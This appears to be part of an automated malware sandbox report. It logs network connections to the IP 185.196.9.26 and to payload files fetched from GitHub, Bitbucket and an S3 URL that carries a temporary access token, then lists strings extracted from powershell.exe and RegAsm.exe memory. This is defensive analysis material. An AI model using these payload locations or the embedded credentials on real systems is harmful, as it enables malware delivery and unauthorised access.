                  Source: unknownTCP traffic detected without corresponding DNS query: 185.196.9.26
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.196.9.26
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.196.9.26
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.196.9.26
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.196.9.26
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.196.9.26
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.196.9.26
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.196.9.26
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.196.9.26
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.196.9.26
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.196.9.26
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.196.9.26
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.196.9.26
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.196.9.26
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.196.9.26
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.196.9.26
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /santomalo/audit/main/img_test.jpg?14441723 HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /rulmerurk/ertertqw/downloads/wil25.txt HTTP/1.1Host: bitbucket.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /4be491a4-012e-46db-bc28-27fee082b0f0/downloads/f4d27c97-7447-48dc-a094-a07a1a72e489/wil25.txt?response-content-disposition=attachment%3B%20filename%3D%22wil25.txt%22&AWSAccessKeyId=ASIA6KOSE3BNGBW4LR47&Signature=KU8K0r0pC6kOvO63BVrMZTsC7%2Bw%3D&x-amz-security-token=IQoJb3JpZ2luX2VjEMv%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJHMEUCIEqHJaRaTsxa7hS3N4x%2FGkHhGylNp1c%2FtHaWMABp9OaTAiEAhGKa%2BaXigWinXz7qx94%2Fdz1%2BZMoaCfODDHmLNQDVpvkqpwIIExAAGgw5ODQ1MjUxMDExNDYiDE1tfzVE8xRz0o13lSqEAth9VZq4M2uouzPRXiooZ53Q4ud5xBWosJAASuO68%2Fm%2FGilxvA4dR4Hmbd9UKw1fhIOtP4fU%2BhYjpcaxW9LNtB3Tb2ZIoeIb5mSa9heTCdCH6DSktw8mBCNyPrKV88ub4XMn3grcr3V1Iqr6pH2LaAluKBUXBJSawdUMbVZqCsIwUANJ8QZfbqXe0w4%2Bx5t6Klwf6lhjxtlGxTGcNuvsngpxL3hx%2BL3kiaRNHTzbnvVr64K8%2BHAj5xyWSg2mIoh57aTjqF%2FdwefSdFVaRkDTWPsqY%2BsSkQ7CbEPDxB9aOtfvRGFWxQCean6kswq3hSbkmi0PhRIYO3UnA%2BXcKyzrCVj%2F0e3ZMK7n1LcGOp0BPNfkGu6KRQ6EXUETRUB9lmhUQOhv2S1UHbu14WIgdFZyUsk7zUgHafEANntC3hvdiPmgzCpab%2BnKFem5ZNvYAL3Ia9bDC90M2lOAmp7MDitjsvOKoKbCZYTOy3DolPfQ0bBGLHd6yaQTd5gEe7F1Z9x%2BV87sTjtC%2FYDH4I1wpK0l33W7F0Kch8ls%2FTbVXVMCh%2Fn1kFyEJlwfqO%2FsDQ%3D%3D&Expires=1727347382 HTTP/1.1Host: bbuseruploads.s3.amazonaws.comConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
                  Source: global trafficDNS traffic detected: DNS query: bitbucket.org
                  Source: global trafficDNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ1510
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#Kerberosv5APREQSHA1
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-rel-token-profile-1.0.pdf#license
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.0#SAMLAssertionID
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV1.1
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLV2.0
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKey
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#EncryptedKeySHA1
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-soap-message-security-1.1#ThumbprintSHA1
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-wssecurity-secext-1.1.xsd
                  Source: powershell.exe, 00000006.00000002.2009787604.000001169AE3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
                  Source: powershell.exe, 00000006.00000002.2180041321.00000116A6042000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: powershell.exe, 00000006.00000002.2009787604.00000116961F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/2005/02/trust/tlsnego#TLS_Wrap
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/actor/next
                  Source: powershell.exe, 00000006.00000002.2009787604.000001169A162000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2002/12/policy
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/sc
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/sc/sct
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/CK/PSHA1
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Issue
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/Nonce
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/Issue
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RST/SCT
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/Issue
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/RSTR/SCT
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/security/trust/SymmetricKey
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/PublicKey
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/04/trust/SymmetricKey
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/06/addressingex
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/faultp9
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
                  Source: powershell.exe, 00000004.00000002.2356536853.00000158A8C2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2009787604.0000011695FD1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
                  Source: powershell.exe, 00000006.00000002.2009787604.000001169A162000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/D
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id10Response
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id11Response
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id12Response
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id13Response
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id14Response
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id15Response
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id16Response
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id17Response
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id18Response
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id19Response
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1Response
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id1ResponseD
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id2
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id20Response
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id21Response
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id22Response
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.00000000033B2000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.0000000002FC1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2080065542.0000000003068000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23Response
                  Source: RegAsm.exe, 0000000A.00000002.2080065542.00000000033C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://tempuri.org/Entity/Id23ResponseD
